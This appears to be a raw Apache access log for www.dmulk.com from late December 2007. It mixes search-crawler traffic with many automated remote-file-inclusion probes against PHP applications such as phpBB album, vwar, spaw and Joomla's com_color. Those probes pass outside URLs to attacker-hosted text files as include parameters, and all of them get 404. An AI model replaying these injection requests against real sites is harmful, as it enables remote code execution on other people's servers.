74.6.22.126 - - [23/Dec/2007:23:43:19 -0800] "GET /minamijewelry/ HTTP/1.0" 200 2094 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.20.230 - - [23/Dec/2007:23:47:40 -0800] "GET /minamijewelry/?M=D HTTP/1.0" 200 2100 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.200.223.106 - - [23/Dec/2007:23:49:53 -0800] "GET /index1.php?sel=http://shopthishouse.com/admin/backup/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
74.200.223.106 - - [23/Dec/2007:23:49:53 -0800] "GET /logs/index1.php?sel=http://shopthishouse.com/admin/backup/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
83.170.102.103 - - [23/Dec/2007:23:52:23 -0800] "GET /logs/access_071129.log/convert/mvcw.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.170.102.103 - - [23/Dec/2007:23:52:23 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.170.102.103 - - [23/Dec/2007:23:52:23 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.170.102.103 - - [23/Dec/2007:23:53:28 -0800] "GET /logs/access_071215.log/convert/mvcw.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.109.22.106 - - [23/Dec/2007:23:54:48 -0800] "GET /logs//templates/headline_temp.php?nst_inc=http://armageddon0683.zoomshare.com/files/file_injek/test_0.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
194.109.22.106 - - [23/Dec/2007:23:54:49 -0800] "GET //templates/headline_temp.php?nst_inc=http://armageddon0683.zoomshare.com/files/file_injek/test_0.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
62.111.179.200 - - [23/Dec/2007:23:56:11 -0800] "GET /logs/access_071215.log/phpwcms/include/inc_ext/spaw/dialogs/send_reminders.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.111.179.200 - - [23/Dec/2007:23:56:15 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/send_reminders.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.111.179.200 - - [23/Dec/2007:23:56:16 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/send_reminders.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.111.179.200 - - [23/Dec/2007:23:59:13 -0800] "GET /logs/access_071215.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.111.179.200 - - [23/Dec/2007:23:59:14 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.111.179.200 - - [23/Dec/2007:23:59:15 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.170.102.103 - - [23/Dec/2007:23:59:28 -0800] "GET /logs/access_071216.log//skin/zero_vote/error.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.170.102.103 - - [23/Dec/2007:23:59:28 -0800] "GET /logs/access_071216.log//skin/zero_vote/error.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.170.102.103 - - [23/Dec/2007:23:59:28 -0800] "GET //skin/zero_vote/error.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.170.102.103 - - [23/Dec/2007:23:59:28 -0800] "GET //skin/zero_vote/error.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.170.102.103 - - [23/Dec/2007:23:59:28 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.170.102.103 - - [23/Dec/2007:23:59:28 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.252.149.16 - - [24/Dec/2007:00:03:15 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.dmulk.com"
193.252.149.16 - - [24/Dec/2007:00:03:17 -0800] "GET /presto/?N=D HTTP/1.1" 200 526 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.dmulk.com"
74.6.29.32 - - [24/Dec/2007:00:04:09 -0800] "GET /?N=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
83.170.102.103 - - [24/Dec/2007:00:04:33 -0800] "GET /logs/access_071212.log//skin/zero_vote/error.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.170.102.103 - - [24/Dec/2007:00:04:34 -0800] "GET /logs/access_071212.log//skin/zero_vote/error.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.24.145 - - [24/Dec/2007:00:05:44 -0800] "GET /presto/?S=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.247.71.13 - - [24/Dec/2007:00:07:47 -0800] "GET /inc/cmses/aedating4CMS.php?dir[inc]=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.175.50 - - [24/Dec/2007:00:08:23 -0800] "GET /logs/access_071215.log/convert/mvcw.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.175.50 - - [24/Dec/2007:00:08:23 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.175.50 - - [24/Dec/2007:00:08:23 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.175.50 - - [24/Dec/2007:00:08:42 -0800] "GET /logs/access_071129.log/convert/mvcw.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.175.50 - - [24/Dec/2007:00:15:31 -0800] "GET /logs/access_071216.log//skin/zero_vote/error.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.175.50 - - [24/Dec/2007:00:15:31 -0800] "GET //skin/zero_vote/error.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.175.50 - - [24/Dec/2007:00:15:31 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.142.212.185 - - [24/Dec/2007:00:16:22 -0800] "GET /retreat1/webcam/retreat1_00123.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [24/Dec/2007:00:17:02 -0800] "GET /retreat1/webcam/retreat1_00417.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
62.193.236.107 - - [24/Dec/2007:00:18:37 -0800] "GET /logs/config.php?path_to_root=http://shopthishouse.com/admin/backup/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
62.193.236.107 - - [24/Dec/2007:00:18:37 -0800] "GET /config.php?path_to_root=http://shopthishouse.com/admin/backup/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
74.6.22.126 - - [24/Dec/2007:00:19:04 -0800] "GET /presto/?N=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
68.142.212.185 - - [24/Dec/2007:00:20:53 -0800] "GET /retreat1/webcam/retreat1_00020.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
74.6.23.232 - - [24/Dec/2007:00:21:07 -0800] "GET /bikes/ HTTP/1.0" 200 2036 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
68.142.212.185 - - [24/Dec/2007:00:21:13 -0800] "GET /retreat1/webcam/retreat1_00476.jpg HTTP/1.0" 200 50309 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [24/Dec/2007:00:22:05 -0800] "GET /retreat1/webcam/retreat1_00861.jpg HTTP/1.0" 200 20028 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [24/Dec/2007:00:23:25 -0800] "GET /retreat1/webcam/retreat1_00816.jpg HTTP/1.0" 200 15376 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [24/Dec/2007:00:23:38 -0800] "GET /retreat1/webcam/retreat1_00895.jpg HTTP/1.0" 200 23384 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [24/Dec/2007:00:24:24 -0800] "GET /retreat1/webcam/retreat1_00478.jpg HTTP/1.0" 200 49384 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
74.6.26.206 - - [24/Dec/2007:00:24:29 -0800] "GET /bikes/?M=A HTTP/1.0" 200 2036 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
68.142.212.185 - - [24/Dec/2007:00:25:24 -0800] "GET /retreat1/webcam/retreat1_00511.jpg HTTP/1.0" 200 17469 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [24/Dec/2007:00:26:05 -0800] "GET /retreat1/webcam/retreat1_00035.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [24/Dec/2007:00:26:52 -0800] "GET /retreat1/webcam/retreat1_00030.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [24/Dec/2007:00:27:33 -0800] "GET /retreat1/webcam/retreat1_00176.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [24/Dec/2007:00:27:56 -0800] "GET /retreat1/webcam/retreat1_00383.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
61.152.158.46 - - [24/Dec/2007:00:28:14 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://116.68.194.36/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
61.152.158.46 - - [24/Dec/2007:00:28:15 -0800] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://116.68.194.36/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
68.142.212.185 - - [24/Dec/2007:00:28:42 -0800] "GET /retreat1/webcam/retreat1_00590.jpg HTTP/1.0" 200 44851 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [24/Dec/2007:00:30:59 -0800] "GET /retreat1/webcam/retreat1_00157.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
66.98.148.56 - - [24/Dec/2007:00:31:51 -0800] "GET /logs/access_071124.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.gulzarii.com/myfolder/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.148.56 - - [24/Dec/2007:00:31:51 -0800] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://www.gulzarii.com/myfolder/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.148.56 - - [24/Dec/2007:00:31:51 -0800] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.gulzarii.com/myfolder/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.7.77 - - [24/Dec/2007:00:32:04 -0800] "GET /minamijewelry/source_images/updated1/?M=A HTTP/1.0" 200 1427 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.98.148.56 - - [24/Dec/2007:00:32:27 -0800] "GET /logs/access_071216.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.gulzarii.com/myfolder/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.142.212.185 - - [24/Dec/2007:00:37:47 -0800] "GET /retreat1/webcam/retreat1_00244.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [24/Dec/2007:00:38:46 -0800] "GET /retreat1/webcam/retreat1_00663.jpg HTTP/1.0" 200 16855 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
80.247.71.13 - - [24/Dec/2007:00:39:00 -0800] "GET /logs/access_071126.log/inc/cmses/aedating4CMS.php?dir[inc]=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.247.71.13 - - [24/Dec/2007:00:39:01 -0800] "GET /logs/inc/cmses/aedating4CMS.php?dir[inc]=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.142.212.185 - - [24/Dec/2007:00:39:10 -0800] "GET /retreat1/webcam/retreat1_00337.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [24/Dec/2007:00:40:17 -0800] "GET /retreat1/webcam/retreat1_00944.jpg HTTP/1.0" 200 16094 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
74.6.24.225 - - [24/Dec/2007:00:44:13 -0800] "GET /bikes/?D=A HTTP/1.0" 200 2036 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.26.137 - - [24/Dec/2007:00:54:14 -0800] "GET /?D=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.28.44 - - [24/Dec/2007:00:56:30 -0800] "GET /logs/access_070815.log HTTP/1.0" 200 31884 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.127.88.38 - - [24/Dec/2007:00:59:04 -0800] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://www.gulzarii.com/myfolder/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.191.50.159 - - [24/Dec/2007:01:02:17 -0800] "GET /logs/administrator/components/com_color/admin.color.php?mosConfig_live_site=http://armageddon0683.zoomshare.com/files/file_injek/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.50.159 - - [24/Dec/2007:01:02:17 -0800] "GET /administrator/components/com_color/admin.color.php?mosConfig_live_site=http://armageddon0683.zoomshare.com/files/file_injek/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.50.159 - - [24/Dec/2007:01:02:23 -0800] "GET /logs/administrator/components/com_color/admin.color.php?mosConfig_live_site=http://armageddon0683.zoomshare.com/files/file_injek/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.50.159 - - [24/Dec/2007:01:02:23 -0800] "GET /administrator/components/com_color/admin.color.php?mosConfig_live_site=http://armageddon0683.zoomshare.com/files/file_injek/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.127.88.38 - - [24/Dec/2007:01:04:12 -0800] "GET /logs/access_071124.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.gulzarii.com/myfolder/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.127.88.38 - - [24/Dec/2007:01:04:12 -0800] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.gulzarii.com/myfolder/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.46 - - [24/Dec/2007:01:04:35 -0800] "GET /logs/access_070915.log HTTP/1.0" 200 65779 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.127.88.38 - - [24/Dec/2007:01:04:38 -0800] "GET /logs/access_071216.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.gulzarii.com/myfolder/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.97.212.250 - - [24/Dec/2007:01:05:23 -0800] "GET /logs/administrator/components/com_color/admin.color.php?mosConfig_live_site=http://wooshck.org/rotation/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.97.212.250 - - [24/Dec/2007:01:05:23 -0800] "GET /administrator/components/com_color/admin.color.php?mosConfig_live_site=http://wooshck.org/rotation/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.97.212.250 - - [24/Dec/2007:01:05:30 -0800] "GET /logs/administrator/components/com_color/admin.color.php?mosConfig_live_site=http://wooshck.org/rotation/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.97.212.250 - - [24/Dec/2007:01:05:30 -0800] "GET /administrator/components/com_color/admin.color.php?mosConfig_live_site=http://wooshck.org/rotation/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.126 - - [24/Dec/2007:01:06:07 -0800] "GET /minamijewelry/ HTTP/1.0" 200 2100 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
83.170.102.103 - - [24/Dec/2007:01:12:25 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.170.102.103 - - [24/Dec/2007:01:12:25 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.170.102.103 - - [24/Dec/2007:01:12:26 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.170.102.103 - - [24/Dec/2007:01:12:31 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.170.102.103 - - [24/Dec/2007:01:12:32 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.127.88.38 - - [24/Dec/2007:01:12:32 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://www.gulzarii.com/myfolder/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.170.102.103 - - [24/Dec/2007:01:12:32 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.191.50.159 - - [24/Dec/2007:01:13:31 -0800] "GET /logs/administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.50.159 - - [24/Dec/2007:01:13:31 -0800] "GET /administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.170.102.103 - - [24/Dec/2007:01:13:46 -0800] "GET /logs/access_071215.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.170.102.103 - - [24/Dec/2007:01:13:46 -0800] "GET /logs/access_071215.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.142.212.185 - - [24/Dec/2007:01:14:30 -0800] "GET /retreat1/webcam/retreat1_00623.jpg HTTP/1.0" 200 47215 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [24/Dec/2007:01:15:10 -0800] "GET /retreat1/webcam/retreat1_00987.jpg HTTP/1.0" 200 15964 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [24/Dec/2007:01:15:54 -0800] "GET /retreat1/webcam/retreat1_00817.jpg HTTP/1.0" 200 15346 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
74.6.22.126 - - [24/Dec/2007:01:16:15 -0800] "GET /minamijewelry/?M=A HTTP/1.0" 200 2100 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
68.142.212.185 - - [24/Dec/2007:01:16:37 -0800] "GET /retreat1/webcam/retreat1_00745.jpg HTTP/1.0" 200 43775 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [24/Dec/2007:01:17:19 -0800] "GET /retreat1/webcam/retreat1_00404.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
76.88.24.0 - - [24/Dec/2007:01:17:30 -0800] "GET /skin/zero_vote/login.php?dir=http://www.laila.jp/item_pics/cmd/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.142.212.185 - - [24/Dec/2007:01:18:02 -0800] "GET /retreat1/webcam/retreat1_00914.jpg HTTP/1.0" 200 21871 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [24/Dec/2007:01:18:41 -0800] "GET /retreat1/webcam/retreat1_00605.jpg HTTP/1.0" 200 49656 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
194.44.156.33 - - [24/Dec/2007:01:22:25 -0800] "GET /inc/cmses/aedating4CMS.php?dir[inc]=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.191.50.159 - - [24/Dec/2007:01:23:27 -0800] "GET /logs/access_071124.log/administrator/components/com_color/admin.color.php?mosConfig_live_site=http://armageddon0683.zoomshare.com/files/file_injek/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.50.159 - - [24/Dec/2007:01:23:32 -0800] "GET /logs/access_071124.log/administrator/components/com_color/admin.color.php?mosConfig_live_site=http://armageddon0683.zoomshare.com/files/file_injek/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.142.212.185 - - [24/Dec/2007:01:32:50 -0800] "GET /retreat1/webcam/retreat1_00763.jpg HTTP/1.0" 200 46546 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [24/Dec/2007:01:33:12 -0800] "GET /retreat1/webcam/retreat1_00308.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
74.6.28.164 - - [24/Dec/2007:01:33:19 -0800] "GET /minamijewelry/?S=A HTTP/1.0" 200 2100 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
68.142.212.185 - - [24/Dec/2007:01:33:34 -0800] "GET /retreat1/webcam/retreat1_00306.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [24/Dec/2007:01:33:54 -0800] "GET /retreat1/webcam/retreat1_00081.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [24/Dec/2007:01:34:13 -0800] "GET /retreat1/webcam/retreat1_00741.jpg HTTP/1.0" 200 47443 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
